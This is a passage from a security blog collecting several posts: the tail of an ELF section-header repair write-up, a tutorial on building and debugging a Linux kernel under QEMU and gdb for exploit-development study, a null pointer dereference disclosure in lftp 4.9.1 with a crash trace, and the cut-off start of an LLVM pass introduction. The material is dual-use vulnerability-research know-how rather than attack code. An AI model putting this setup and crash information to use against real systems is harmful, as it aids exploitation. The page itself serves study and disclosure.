href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_-gG_X7-qVhi4KdsY9eDeU_ncdLETXwFhsdTdgA9u4C3RLeLjMmuFSK7xcpMZYFHDOwzwSuaHxxb2lbSWn5bwh7kTzQHCm12dOfwrnkHENiCRmzXw34yuY6YwIjbu4GgbQjiyq6P4bhc/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="494" data-original-width="866" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_-gG_X7-qVhi4KdsY9eDeU_ncdLETXwFhsdTdgA9u4C3RLeLjMmuFSK7xcpMZYFHDOwzwSuaHxxb2lbSWn5bwh7kTzQHCm12dOfwrnkHENiCRmzXw34yuY6YwIjbu4GgbQjiyq6P4bhc/s16000/Screenshot+from+2020-11-11+21-12-55.png" /></a></div><br /><div><br /></div><div>Looks like the program headers might be just fine---<i>i checked, they are</i>---, which means our binary should still be able to execute; but there's obviously something wrong with the <span style="font-family: "courier";">e_shnum</span> and <span style="font-family: "courier";">e_shoff</span> fields in the ELF header. </div><div> </div><div>We already have some freebies namely, the location of the .shstrtab, the number of sections 24. So we can patch this up and see if it gives us any more postive feedback, here's the header before the patch:</div><div> </div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjy19l7sYagLysJHAoOFdGFmkfrlLTF8H8MRvN-Pjpttus2oRpm6UfDgIAgQeEXcqceaOwsH5gR8PJo8hwWerV6O2CgJFiLxX8Vb8G2FwEn8G-i6bYwijf5tlCG9wOfG6QRXTKk6ehij64/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="434" data-original-width="1411" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjy19l7sYagLysJHAoOFdGFmkfrlLTF8H8MRvN-Pjpttus2oRpm6UfDgIAgQeEXcqceaOwsH5gR8PJo8hwWerV6O2CgJFiLxX8Vb8G2FwEn8G-i6bYwijf5tlCG9wOfG6QRXTKk6ehij64/s16000/Screenshot+from+2020-11-11+23-52-47.png" /></a></div><br /><br /></div><div><br /></div><div>And here's after:</div><div> </div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgOd20S_cBYYi2z484Xt82zZO_KIKoxVKvsHavXFcf08GH02ntoKpRIX0MYxqEmuYP4HdlEr3TdQuOWGrozRo2kL5chQ-l1lYC9grOAzh6LidWOKQqLroY7VwMXfb097b53ha3xldjCt4Q/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="420" data-original-width="1396" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgOd20S_cBYYi2z484Xt82zZO_KIKoxVKvsHavXFcf08GH02ntoKpRIX0MYxqEmuYP4HdlEr3TdQuOWGrozRo2kL5chQ-l1lYC9grOAzh6LidWOKQqLroY7VwMXfb097b53ha3xldjCt4Q/s16000/Screenshot+from+2020-11-11+23-55-50.png" /></a></div><br /><br /></div><div> </div><div>Okay so that worked out nicely, we have a couple more things to achieve on to the next phase, finding the <span style="font-family: courier;">e_shoff</span> the beginning of the section header table. Given that this is probably compiled with GCC, we can expect the actual <span style="font-family: "courier";">e_shoff</span> offset to be near the end of the <span style="font-family: "courier";">.shstrtab</span>, here's what that section looks like:</div><div> </div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYftSLx0Au40BAw4voG1wom6l0WaOPRe6JB8kiLzFWMX8a_xWqNwxYe9FRFVtb2gINCUHMGLQxDMTzUctfEHHLsqu4mZO2kfYIwpN_LcFgGIjj3lTaNZt3tAmSwKvTCHra_x0E29Eh140/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="418" data-original-width="870" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYftSLx0Au40BAw4voG1wom6l0WaOPRe6JB8kiLzFWMX8a_xWqNwxYe9FRFVtb2gINCUHMGLQxDMTzUctfEHHLsqu4mZO2kfYIwpN_LcFgGIjj3lTaNZt3tAmSwKvTCHra_x0E29Eh140/s16000/Screenshot+from+2020-11-12+00-20-35.png" /></a></div><br /><br /></div><div>Looking at some of the dead give always for a section header table--especially the <span style="font-family: courier;">0x6fffff6f</span> we can be pretty confident we just found ours! Looking at the dump I'm going to make the guess that <span style="font-family: courier;">0x3168</span> is where it starts; if we patch this in readelf does the following:</div><div><br /></div><div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQ-ptAi3Y79e6BnXXM0LxLI8qxVS1rSqV7RG0ZW_f5O2tcUBnH4Gg9Jgp_KUyRB-lI8St-M0sAjLc_puwLeSDfSLFk6hyS7q-31XIwXQsyDDst9qzOmErgc6pV4fARxadaZr1Ug6_CFqI/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="533" data-original-width="1431" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQ-ptAi3Y79e6BnXXM0LxLI8qxVS1rSqV7RG0ZW_f5O2tcUBnH4Gg9Jgp_KUyRB-lI8St-M0sAjLc_puwLeSDfSLFk6hyS7q-31XIwXQsyDDst9qzOmErgc6pV4fARxadaZr1Ug6_CFqI/s16000/Screenshot+from+2020-11-12+00-00-29.png" /> </a></div><div class="separator" style="clear: both; text-align: center;"> </div></div><div dir="ltr" style="text-align: left;" trbidi="on">And bingo, we have something that can be parsed as a section header table, but there are still some problems, it looks like someone messed with the link fields. We're going to need to fill them out. And I think that will make a great follow up post!<div><br /></div></div></div>
Keith Makanhttp://www.blogger.com/profile/10220395050030522020noreply@blogger.com0tag:blogger.com,1999:blog-5845671313867906274.post-44804191777232934082020-11-10T21:10:00.006-08:002020-11-11T07:04:37.255-08:00[Linux Kernel Exploitation 0x0] Debugging the Kernel with QEMU<p>Hi folks, in this post I'm going to walk through how to setup the linux kernel for debugging. I will also demonstrate that the setup works by setting a break-point to a test driver I wrote myself. All the code will be available from my gitlab, all the links to my gitlab will be re-posted at the end. </p><p>The setup I describe here re-uses some parts of the syzkaller setup, and for good reason later on in the post series I will break into a tutorial for the syzkaller tool as well. So lets get on with it.</p><p><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfJqc1KEObI3B8RhfyqjoOUwTXhdpmQu9hz7XBB9dYBsJsCUSZF1KpdPz3hATngUhAI5uKNpkTQtG2Ks3aWGIl_v_VfkZoJOQQk-xWPyYRLrXCiHEem39M2tIoPHQ3AP1KRWCpQ6odRMs/s1109/Screenshot+from+2020-11-11+17-00-44.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="625" data-original-width="1109" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfJqc1KEObI3B8RhfyqjoOUwTXhdpmQu9hz7XBB9dYBsJsCUSZF1KpdPz3hATngUhAI5uKNpkTQtG2Ks3aWGIl_v_VfkZoJOQQk-xWPyYRLrXCiHEem39M2tIoPHQ3AP1KRWCpQ6odRMs/w640-h360/Screenshot+from+2020-11-11+17-00-44.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Screenshot of a successful debug session with full debug symbols for the kernel! We can even see the call to start_kernel and a frame before that as well!<br /></td></tr></tbody></table><br /> </p><h2 style="text-align: left;">The Process</h2><p>Okay so we want to study kernel exploitation but given that the kernel isn't something totally accessible in userspace, its not as convenient to debug as userpace stuff, we need a bit of a run up before we can actually poke and prod the kernel to figure out how to write our exploits. So there's a number of important steps to how we get this done, here's what we're going to do:</p><ol style="text-align: left;"><li>Build a kernel</li><li>Build an image</li><li>Launch the virtual machine </li><li>Attach and setup the debugger</li><li>Building, loading and debugging a test module <br /></li></ol><p>We also need to be able to build our kernel because there may be build options that are important to configure in order to control exploit protection or include modules and functionality to the kernel when needed. <br /></p><h2 style="text-align: left;">Building a Kernel</h2><p>Okay so before we get going with launching our Qemu instances and debugging modules we need an environment. For convenience sake I'm working off of a fresh Ubuntu 18.04.5 LTS machine. I'll document the processes from fresh install to first successful kernel build.</p><p>To start we need to make sure we have everything we need to build a kernel:</p><p><br /></p><p><span style="font-family: courier;">$<b>sudo apt-get update</b></span></p><p><span style="font-family: courier;">$<b>sudo apt-get upgrade </b><br /></span></p><p><span style="font-family: courier;">$<b>sudo apt-get install git fakeroot build-essential ncurses-dev xz-utils libssl-dev bc flex libelf-dev bison qemu-system-x86</b></span></p><p><span style="font-family: courier;"><b> </b> </span><br /></p><p>Next we obviously need a kernel so lets download a brand new kernel:</p><p><span style="font-family: courier;"> </span></p><p><span style="font-family: courier;">$<b>wget https://cdn.kernel.org/pub/linux/kernel/v5.x/linux-5.9.7.tar.xz</b><br />--2020-11-10 23:00:26-- https://cdn.kernel.org/pub/linux/kernel/v5.x/linux-5.9.7.tar.xz<br />Resolving cdn.kernel.org (cdn.kernel.org)... 151.101.225.176, 2a04:4e42:35::432<br />Connecting to cdn.kernel.org (cdn.kernel.org)|151.101.225.176|:443... connected.<br />HTTP request sent, awaiting response... 200 OK<br />Length: 115538096 (110M) [application/x-xz]<br />Saving to: ‘linux-5.9.7.tar.xz’<br /><br />linux-5.9.7.tar.xz 42%[=============> ] 46.79M 3.08MB/s eta 23s </span></p><p><span style="font-family: courier;"><br /></span></p><p><span style="font-family: courier;">... <br /></span></p><p><span style="font-family: courier;">$<b>tar -xf linux-5.9.7.tar.xz</b></span></p><p> </p><p>We're just a couple steps from sending the final build commands, before we get to that lets make sure the kernel config is ready to rock. Because we're working on a Linux host we can simply swipe the .config for the virtual machine's Ubuntu kernel like so:</p><p><span style="font-family: courier;"> </span></p><p><span style="font-family: courier;">$<b>cp /boot/config-5.4.0-52-generic .config</b></span></p><p> </p><p>We then need to select some options that make debugging and exploit dev a little easier. First thing we need is to merge some options for making the kernel easier to run in a virtual machine:</p><p><span style="font-family: courier;"> </span></p><p><span style="font-family: courier;">$<b>make kvmconfig</b></span></p><p><span style="font-family: courier;">Using .config as base<br />Merging ./kernel/configs/kvm_guest.config<br />#<br /># merged configuration written to .config (needs make)<br />#</span></p><p><span style="font-family: courier;">...</span></p><p> </p><p>Great, now we need to enable some options for debug symbols, kaslr and other awesome things. So open the <span style="font-family: courier;">.config</span> somewhere in a text editor and make sure you either add or modify the file so these options are set:</p><p><span style="font-family: courier;">CONFIG_KCOV=y<br />CONFIG_DEBUG_INFO=y<br />CONFIG_KASAN=y<br />CONFIG_KASAN_INLINE=y<br />CONFIG_CONFIGFS_FS=y<br />CONFIG_SECURITYFS=y </span><br /><span style="font-family: courier;"><span style="font-family: courier;"># CONFIG_RANDOMIZE_BASE is not set<br /></span></span></p><p>Cool now we need to make sure the config is ready to go for a build:</p><p><span style="font-family: courier;">$<b>make savedefconfig</b></span></p><p><span style="font-family: courier;">$<b>make -j4</b></span></p><p><span style="font-family: courier;"> ...</span></p><p>Now you should grab some coffee, play a startcraft2 game because this may take a while. Okay so if your build worked you should have an object file in the following location:</p><p><span style="font-family: courier;">[kernel_dir]/arch/x86_64/boot/bzImage</span> </p><h2 style="text-align: left;"> </h2><h2 style="text-align: left;">Build an image</h2><p>We're going to build an image for this kernel so we might as well plop a "image" directory in this folder:</p><p><span style="font-family: courier;">$<b>mkdir [kernel_dir]/image/</b></span></p><p>Once you're kernel is build we need to start thinking about how to build a file system for this. Here I'm going to cheat and steal some tips from the syzkaller folks. We need to first download syzkaller, as follows:</p><p><span style="font-family: courier;"> </span></p><p><span style="font-family: courier;">$<b>git clone https://github.com/google/syzkaller.git</b></span></p><p><span style="font-family: courier;">Cloning into 'syzkaller'...<br />remote: Enumerating objects: 1, done.<br />remote: Counting objects: 100% (1/1), done.<br />...<br /></span></p><p> </p><p>Move back to the kernel build and setup an image:</p><p><span style="font-family: courier;"> </span></p><p><span style="font-family: courier;">$<b>cd [kernel_dir]/image/</b></span></p><p><span style="font-family: courier;">$<b>cp [syzkaller_dir]/tools/create_image.sh .</b></span></p><p> </p><p>Okay so we can now create an image, all we need to do is simply invoke create_image.sh:</p><p><span style="font-family: courier;"> </span></p><p><span style="font-family: courier;">$<b>./create_image.sh </b></span></p><p><span style="font-family: courier;">+ DIR=chroot<br />+ PREINSTALL_PKGS=openssh-server,curl,tar,gcc,libc6-dev,time,strace,sudo,less,psmisc,selinux-utils,policycoreutils,checkpolicy,selinux-policy-default,firmware-atheros,python,xrdp,g++,make,libtool,autoconf,nasm<br />+ '[' -z ']'<br />+ ADD_PACKAGE=make,sysbench,git,vim,tmux,usbutils,tcpdump</span></p><p><span style="font-family: courier;">...</span><br /></p><p> </p><p>If that worked you should have the following in your folder:</p><p><span style="font-family: courier;"> </span></p><p><span style="font-family: courier;">$<b>ls</b> </span></p><p><span style="font-family: courier;">chroot/</span></p><p><span style="font-family: courier;">create-image.sh</span></p><p><span style="font-family: courier;">stretch.id_rsa</span></p><p><span style="font-family: courier;">stretch.id_rsa.pub</span></p><p><span style="font-family: courier;">stretch.img</span><br /></p><p><br /></p><h2 style="text-align: left;">Launch the virtual machine <br /></h2><p>Now we can launch qemu with all the goodies in place:</p><p><span style="font-family: courier;"> </span></p><p><span style="font-family: courier;">qemu-system-x86_64 \<br /> -kernel <b>../arch/boot/x86_64/bzImage</b> \<br /> -append "console=ttyS0 root=/dev/sda earlyprintk=serial nokaslr"\<br /> -hda <b>./stretch.img</b> \<br /> -net user,hostfwd=tcp::10021-:22 -net nic \<br /> -enable-kvm \<br /> -nographic \<br /> -m 2G \<br /> -s \<br /> -S \<br /> -smp 2 \<br /> -pidfile vm.pid \<br /> 2>&1 | tee vm.log</span></p><p><span style="font-family: courier;">...</span></p><p><br />The <span style="font-family: courier;">-s</span> is a shorthand for <span style="font-family: courier;">-gdb tcp::1234</span>, which means the gdbserver will be hosted at port 1234. -S tells qemu not to start the cpu automatically, this gives us a chance to set a breakpoint before the kernel starts executing. </p><p>So that's the image running smoothly, lets setup our debugging environment.</p><p><br /></p><h2 style="text-align: left;">Attach and setup the debugger<br /></h2><p>We can then attach a gdb debugger to the qemu instance as follows. On another terminal, separate from the one running your qemu instance, start up gdb and issue the following commands:</p><p><span style="font-family: courier;"> </span></p><p><span style="font-family: courier;">$<b>cd [kernel_dir]/image/ </b><br /></span></p><p><span style="font-family: courier;">$<b>gdb ../vmlinux<br /></b></span></p><p><span style="font-family: courier;">Reading symbols from ../vmlinux...</span></p><p><span style="font-family: courier;">(gdb)<b> target remote :1234<br /></b></span></p><p><span style="font-family: courier;">Remote debugging using :1234<br />0x000000000000fff0 in exception_stacks ()<br /></span></p><p><span style="font-family: courier;">(gdb) <b>c</b></span></p><p> </p><p>We give the "c" command to continue execution. We can now set some of our own breakpoints. As part of the tutorial I've included a custom IOCTL driver and app code (code that invokes the ioctl from userspace), i thought this would be nifty since it shows full ability to develope and debug a driver, something crucial to hunting down modern bugs and exploit development. Anyway lets code and build our own module.</p><p> </p><p> </p><h2 style="text-align: left;">Building, Loading and debugging a test module<br /></h2><p>Okay so we need to make a test ioctl driver, so lets head over the to kernel source directory and make a new folder in the /driver/ subfolder:</p><p><span style="font-family: courier;"> </span></p><p><span style="font-family: courier;">$</span><b><span style="font-family: courier;">cd [kernel_dir]/drivers/</span></b></p><p><span style="font-family: courier;">$</span><b><span style="font-family: courier;">mkdir debug_driver/</span></b></p><p><span style="font-family: courier;">$</span><b><span style="font-family: courier;">cd debug_driver/ <br /></span></b></p><p><span style="font-family: courier;">$</span><b><span style="font-family: courier;">touch debug_driver.c</span></b></p><p><span style="font-family: courier;">$</span><b><span style="font-family: courier;">touch debug_driver_app.c</span></b></p><p><span style="font-family: courier;">$</span><b><span style="font-family: courier;">touch Makefile</span></b></p><p> </p><p>The code for <span style="font-family: courier;">debug_driver.c</span> and <span style="font-family: courier;">debug_driver_app.c </span>as we well as the <span style="font-family: courier;">Makefile</span> are available at this repo <a href="https://gitlab.com/k3170makan/linux-kernel-exploit-development">https://gitlab.com/k3170makan/linux-kernel-exploit-development</a>. All you need to do is download the repo and stick this in its own folder under <span style="font-family: courier;">[kernel_dir]/drivers/</span>. To build the module the we need to set the "M" variable in the kernel make script:</p><p><span style="font-family: courier;"> </span></p><p><span style="font-family: courier;">$<b>cd [kernel_dir]; make -C . M=drivers/debug_driver/</b></span></p><p><span style="font-family: courier;">make: Entering directory '/home/kh3m/Research/Kernel/debug_image/linux-5.5.3'<br /> AR drivers/debug_driver//built-in.a<br /> CC [M] drivers/debug_driver//debug_driver.o</span></p><p><span style="font-family: courier;">...</span></p><p> </p><p>Now we need to get this module on our qemu host somehow, I do this the hard way, I'm sure there's all sorts of nifty ways to scp files onto the qemu host but I actually just re-create the image after copying the drivers to a folder to be baked into the start up filesystem. First we need to edit create-image.sh so it includes everything in a folder we specify, that way we can just dump stuff in the folder and run create-image.sh whenever we want those files on a live instance.</p><p>So before create-image.sh builds the disk image on line 129, stick this in there:</p><p>++ <span style="font-family: courier;">sudo cp -r ./add/* $DIR/home/.</span><br /></p><p>now we make a "add" folder and stick the kernel module and app code in there:</p><p><span style="font-family: courier;"> </span></p><p><span style="font-family: courier;">$<b> cd [kernel_dir]/image/</b></span></p><p><span style="font-family: courier;">$ <b>mkdir add/</b></span></p><p><span style="font-family: courier;">$ <b>cd add/</b></span></p><p><span style="font-family: courier;">$ <b>cp ../../drivers/debug_driver/debug_driver.ko .</b><br /></span></p><p><span style="font-family: courier;">$ <b>cp ../../drivers/debug_driver/debug_driver_app.c .</b></span></p><p><span style="font-family: courier;">$ <b>./create-image.sh</b> </span></p><p> </p><p>Okay so we have a module, we have a symbol file debug_driver.ko, with stuff we need to set breakpoints. Lets load the module into the kernel, then check where it gets loaded before we actually set the breakpoint:</p><p><br /></p><p><span style="font-family: courier;">root@syzkaller:$ <b>cd /home/</b></span></p><p><span style="font-family: courier;">root@syzkaller:$ insmod debug_driver.ko</span></p><p><span style="font-family: courier;"> [ 32.792570] audit: type=1400 audit(1605058227.605:7): avc: denied { module_load } for pid=249 comm="insmod" path="/home/debug_driver.ko" dev="sda" ino=21253 scontext=system_u:system_r:kernel_t:s0 1<br />[ 32.793766] debug_driver: loading out-of-tree module taints kernel.<br />[ 32.800394] [debug_driver] loaded! <br />[ 32.800826] [debug_driver] device registered successfully<br />[ 32.802298] [debug_driver] device has been successfully created <b><br /></b></span></p><p> </p><p>Before we can debug it properly we need to know where it is loaded in kernel memory:</p><p><span style="font-family: courier;"> </span></p><p><span style="font-family: courier;">root@syzkaller:/home# <b>cat /proc/modules</b> <br />debug_driver 16384 0 - Live <b>0xffffffffa0000000</b> (O)</span></p><p> </p><p>Okay lets now set our breakpoint and load the symbol file using the base address of the module:</p><p><span style="font-family: courier;"> </span></p><p><span style="font-family: courier;"> (gdb) <b>add-symbol-file ../drivers/debug_driver/debug_driver.ko 0xffffffffa0000000</b><br />add symbol table from file "../drivers/debug_driver/debug_driver.ko" at<br /> .text_addr = 0xffffffffa0000000<br />(y or n) <b>y</b><br />Reading symbols from ../drivers/debug_driver/debug_driver.ko...<br />(gdb) <b>break dev_read</b><br />Breakpoint 1 at <b>0xffffffffa0000010: file drivers/debug_driver//debug_driver.c</b>, line 81.<br />(gdb) c</span><br /><br /></p><p> </p><p>Cool lets execute the driver program so we can trigger the code we want:</p><p><span style="font-family: courier;"> </span></p><p><span style="font-family: courier;">root@syzkaller:$ <b>gcc -o debug_driver_app.elf debug_driver_app.c<br /></b></span></p><p><span style="font-family: courier;"><span style="font-family: courier;">root@syzkaller:/home# <b>./debug_driver_app.elf </b><br />Usage: ./debug_driver_app.elf [message to write] [read length] <br /></span></span></p><p><span style="font-family: courier;"><span style="font-family: courier;">root@syzkaller:</span>$ <b>./debug_driver_app.elf "hello" 10</b></span></p><span style="font-family: courier;">[ 160.083320] [debug_driver] message successfully copied message => [hello]<br />[ 160.083326] [debug_driver] buffer copied to message holder<br />[debug_driver] r[ 160.086175] [debug_driver] device released </span><p><br /></p><p> </p><p>This should trigger the <span style="font-family: courier;">dev_read</span> function; and as we can see in the attached debugger:</p><p><span style="font-family: courier;"><b> </b></span></p><p><span style="font-family: courier;"><b>Thread 2 hit Breakpoint 1, dev_read</b> (filep=0xffff888067c29dc0, buffer=0xffff888067c29dc0 "", <br /> len=16, offset=0xffffc900002c7eb8) at drivers/debug_driver//debug_driver.c:81<br />81 error_count = copy_to_user(buffer,message,len); //copy out of message into buffer</span><br /><br /></p><p>So thats the breakpoint hit! We achived our goal for this post, if you'd like to explore more try setting more breakpoints and before moving on to the next post make sure to get your gdb foo up. Next post is going to look at exploitation of stack vulnerabilities. <br /></p><p></p><h2 style="text-align: left;">References and Reading</h2><ol style="text-align: left;"><li><a href="https://blog.infosectcbr.com.au/2020/02/linux-kernel-stack-smashing.html">https://blog.infosectcbr.com.au/2020/02/linux-kernel-stack-smashing.html</a></li><li><a href="https://www.kernel.org/doc/html/latest/dev-tools/gdb-kernel-debugging.html">https://www.kernel.org/doc/html/latest/dev-tools/gdb-kernel-debugging.html</a></li><li><a href="https://medium.com/@villebaillie25/how-to-debug-your-linux-kernel-570399f36acc">https://medium.com/@villebaillie25/how-to-debug-your-linux-kernel-570399f36acc</a> </li><li><a href="https://www.starlab.io/blog/using-gdb-to-debug-the-linux-kernel">https://www.starlab.io/blog/using-gdb-to-debug-the-linux-kernel</a></li><li><a href="https://opensource.com/article/18/10/kbuild-and-kconfig">https://opensource.com/article/18/10/kbuild-and-kconfig</a> </li><li><a href="https://nixos.wiki/wiki/Kernel_Debugging_with_QEMU">https://nixos.wiki/wiki/Kernel_Debugging_with_QEMU</a> </li><li>Debug driver code and Makefile <a href="https://gitlab.com/k3170makan/linux-kernel-exploit-development">https://gitlab.com/k3170makan/linux-kernel-exploit-development</a> <br /></li></ol><p> <br /></p><p> <br /></p><p><br /></p><p><br /></p><p><br /></p><p><br /></p><p> </p><p> </p><p> <br /></p><p> </p><p> </p><p><br /></p><p><br /></p>Keith Makanhttp://www.blogger.com/profile/10220395050030522020noreply@blogger.com0tag:blogger.com,1999:blog-5845671313867906274.post-44628360728856270332020-06-20T23:53:00.000-07:002020-06-20T23:57:40.842-07:00[Memory Corruption Bugs] Lftp Null pointer dereference (<= 4.9.1) in CmdExec::FeedCmd<div><br /></div><div><ul style="text-align: left;"><li>Date: 06-21-20<br /></li><li>Vendor Homepage: <a href="https://lftp.yar.ru/">https://lftp.yar.ru/</a><br /></li><li>Software Link: <a href="http://lftp.yar.ru/ftp/lftp-4.9.1.tar.gz">http://lftp.yar.ru/ftp/lftp-4.9.1.tar.gz</a> <br /></li><li>Version: <= 4.9.1 <br /></li><li>Bug link: <a href="https://github.com/lavv17/lftp/issues/593">https://github.com/lavv17/lftp/issues/593</a> <br /></li></ul></div><div>I've discovered a null pointer deference bug in LFTP version 4.9.1 which probably affects previous versions. The bug occurs in CmdExec::FeedCmd and triggers in strlen due to a null pointer argument. The following gdb trace demonstrates</div><div>this:</div><div><br /></div><div><br /></div><div><span style="font-family: courier;">(gdb) r -f lftp_cmdfile_fuzz/crashes/id:000000,sig:11,src:000000,op:havoc,rep:4 <br />The program being debugged has been started already.<br />...<br />Breakpoint 5, 0x0000000000461b61 in CmdExec::FeedCmd(char const*) ()<br />(gdb) x/5ig $rip<br />=> 0x461b61 <_ZN7CmdExec7FeedCmdEPKc+97>: callq 0x43a3a0 <b><strlen@plt></b><br /> 0x461b66 <_ZN7CmdExec7FeedCmdEPKc+102>: mov %rbx,%rdi<br /> 0x461b69 <_ZN7CmdExec7FeedCmdEPKc+105>: mov %r14,%rsi<br /> 0x461b6c <_ZN7CmdExec7FeedCmdEPKc+108>: mov %eax,%edx<br /> 0x461b6e <_ZN7CmdExec7FeedCmdEPKc+110>: add $0x8,%rsp</span></div><div><span style="font-family: courier;"><b>(gdb) x/1xg $rsi<br />0x0: Cannot access memory at address 0x0</b> <--- argument passed to strlen is a null pointer<br />(gdb) ni<br /><br />Program received signal SIGSEGV, Segmentation fault.<br />__strlen_avx2 () at ../sysdeps/x86_64/multiarch/strlen-avx2.S:65<br />65 ../sysdeps/x86_64/multiarch/strlen-avx2.S: No such file or directory.<br />(gdb) i s<br />#0 __strlen_avx2 () at ../sysdeps/x86_64/multiarch/strlen-avx2.S:65<br /><b>#1 0x0000000000461b66 in CmdExec::FeedCmd(char const*) ()</b><br />#2 0x00000000004726f7 in cmd_subsh(CmdExec*) ()<br />#3 0x0000000000462fa1 in CmdExec::exec_parsed_command() ()<br />#4 0x0000000000468d60 in CmdExec::Do() ()<br />#5 0x0000000000563a76 in SMTask::ScheduleThis() ()<br />#6 0x000000000056325d in SMTask::Schedule() ()<br />#7 0x00000000004604ce in Job::WaitDone() ()<br />#8 0x000000000043edfd in main ()</span><br /></div><div><br /></div><div>Testing this on the latest binaries from the Ubuntu repository</div><div><br /></div><div><span style="font-family: courier;">>$ lftp -v<br />LFTP | Version 4.8.4 | Copyright (c) 1996-2017 Alexander V. Lukyanov<br /><br />LFTP is free software: you can redistribute it and/or modify<br />it under the terms of the GNU General Public License as published by<br />the Free Software Foundation, either version 3 of the License, or<br />(at your option) any later version.<br />...<br />>$ lftp -f ../lftp_cmdfile_fuzz/crashes/id\:000000\,sig\:11\,src\:000000\,op\:havoc\,rep\:4 <br /><b>Segmentation fault</b></span><br /><br /></div><div>Some closing remarks: I've reported the bug to the Debian folks so they are aware, it didn't make the bar for a vulnerability but I think this may constitute a problem on some platforms and speak towards bigger problems in the lftpd code base. I don't know of any public ways to exploit this but I'm posting it so there is public record and awareness.</div>Keith Makanhttp://www.blogger.com/profile/10220395050030522020noreply@blogger.com0tag:blogger.com,1999:blog-5845671313867906274.post-57631553029575481752020-04-06T04:36:00.000-07:002020-04-06T04:57:30.969-07:00[Learning LLVM I ] Introduction to the LLVM Pass Framework<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
Hi folks, its been a while! In this post I'm going to talk about getting started with LLVM and I'll discuss writing a basic pass which we will build on as the post series develops.<br />
<br />
<h2 style="text-align: left;">
Why LLVM?</h2>
<br />
LLVM is becoming really popular, with a sprawling community behind it and a string of research projects contributing plugins and passes there's ever more reason to get involved and hack out some passes of your own. <br />
<br />
We should start with what is LLVM? LLVM formerly standing for "Low Level Virtual Machine" (<i>I hear the acronym no longer means this</i>) now refers to a collection of tools that comprise a whole compiler architecture and tool chain. There are components that debug, instrument code, link libraries and much much more. In this post we will be focusing on llvm as it pertains to the set of libraries for interacting with the compiler internals called the LLVM Pass Framework.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6eqc4MAj02128sZWyxty5ax5tqMdLg-MfDanhfLpAqSR-gISat1PnsW3L7fBYFykfnFfVVKPRLY0ICO6DnqZ6z5DZ2SJnKGR8c6e5IG1oquNtBcuWNGPIjCFLb-aodmdvxrxNm-MMQv4/s1600/LLVM+Architecture.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="608" data-original-width="1045" height="372" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6eqc4MAj02128sZWyxty5ax5tqMdLg-MfDanhfLpAqSR-gISat1PnsW3L7fBYFykfnFfVVKPRLY0ICO6DnqZ6z5DZ2SJnKGR8c6e5IG1oquNtBcuWNGPIjCFLb-aodmdvxrxNm-MMQv4/s640/LLVM+Architecture.png" width="640" /></a></div>
<br />
<br />
An important thing to know about LLVM before we move on is its modular design. The actual compiler is comprised of 3 seperate components namley the:<br />
<ul style="text-align: left;">
<li><b>Front-end</b> - which handles lexing and compiling code into LLVM's intermediate representation (<i>more on this in future posts</i>). IR is a powerful tool in compilers especially here because it means whatever strange language you generated the IR from doesn't really mean anything to the phases going forward. LLVM can be re-targeted for pretty much whatever you can contrive into bitcode or IR. </li>
<li><b>Optimizer</b> - The optimizer performs uhm well optimization on the IR passed to it. There are a ton of different optimzations <i>(I believe some papers speak of something like 100 different loop optimzations for instance</i>). The optimizer strips out as much redudent look ups or dead variable assignments as possible all backed by the static single assignment (SSA) form (<i>each register is only assigned a value once)</i>. This SSA grammar form allows the compiler to isolate imporant properties and anomalies in the langauge that would otherwise be quite ambiguos and tedious to code around. </li>
<li><b>Back-end</b> - This part of the compiler emits the actual machine depedent assembler code. If you want to participate in the machine dependent code generator then writing a <span style="font-family: "courier new" , "courier" , monospace;">MachineFunctionPass</span> is for you since it kicks in everytime a function is rendered in machine dependent code (<i>I discuss the pass types further on in the post</i>). <i>Useful reasons to do this might be to check for differentials in the IR vs machine code, maybe to nuke certain instructions like cache flushing incase code is trying some side-channel attacks, maybe inject functions that force it to run with a conditioned cache to defen aginst attacks or instrument specific asm side effects at machine level and im sure tons more awesome stuff.</i></li>
<i>
</i></ul>
We can see from the diagram above that IR floats between the different stages meaning passes actually operate on llvm IR. This means you can't run into this assuming that you can filter for stack base register behavior or instruction pointer weirdness. You'll have to get to grips with LLVM IR if you mean to do anything useful with the framework, its the lingua franca of the compiler so learn it good.<br />
<br />
This video is an excellent introduction to the LLVM IR concepts please check it out if you're looking or a well structured and well delivered introduction <a href="https://www.youtube.com/watch?v=m8G_S5LwlTo">https://www.youtube.com/watch?v=m8G_S5LwlTo</a> .<br />
<br />
<h2 style="text-align: left;">
Here come the compiler bugs</h2>
<br />
